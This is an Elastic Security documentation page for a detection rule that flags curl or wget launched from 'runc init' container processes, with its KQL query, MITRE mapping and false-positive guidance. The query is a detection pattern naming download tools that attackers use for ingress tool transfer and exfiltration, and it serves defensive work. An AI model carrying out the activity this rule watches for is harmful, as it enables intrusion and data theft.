Elastic Security Detection Rules

Curl or Wget Execution from Container Context

Last updated 11 days ago on 2026-04-22
Created 11 days ago on 2026-04-22

About

Detects execution of curl or wget from processes whose title aligns with **`runc init`**, a common fingerprint for workloads running inside **OCI/runc-backed containers** on Linux hosts instrumented with Auditd Manager. After breaking out of an application container or abusing a privileged workload, attackers often pull ingress tooling (stagers, scripts, implants) or stage exfiltration with minimal HTTP clients. Those utilities are also used benignly in images, so context matters; the `runc init` anchor narrows the signal to the container runtime boundary where unexpected download clients are more worthy of review than the same binaries on a bare-metal admin shell.
Tags
Domain: EndpointOS: LinuxUse Case: Threat DetectionTactic: Command and ControlTactic: ExecutionDomain: ContainersData Source: Auditd ManagerLanguage: kuery
Severity
medium
Risk Score
47
MITRE ATT&CK™

Command and Control (TA0011)(external, opens in a new tab or window)

Ingress Tool Transfer (T1105)(external, opens in a new tab or window)

False Positive Examples
Base images, entrypoints, or init wrappers may legitimately invoke curl or wget during container startup (package installs, health checks); baseline trusted images and exclude stable image digests or namespaces when noisy. Developer-oriented containers and CI build pods can run curl/wget from PID 1 descendants under runc; correlate with build pipelines and approved registries.
License
Elastic License v2(external, opens in a new tab or window)

Definition

Rule Type
Query (Kibana Query Language)
Integration Pack
Prebuilt Security Detection Rules
Index Patterns
auditbeat-*logs-auditd_manager.auditd-*
Related Integrations

auditd_manager(external, opens in a new tab or window)

Query
text code block:
host.os.type:linux and 
data_stream.dataset:"auditd_manager.auditd" and
event.action:("executed" or "exec") and
process.title:"runc init" and
(
  process.name:(curl or wget) or
  process.args:(* curl* or */bin/curl* or *wget*)
)

Install detection rules in Elastic Security

Detect Curl or Wget Execution from Container Context in the Elastic Security detection engine by installing this rule into your Elastic Stack.

To setup this rule, check out the installation guide for Prebuilt Security Detection Rules(external, opens in a new tab or window).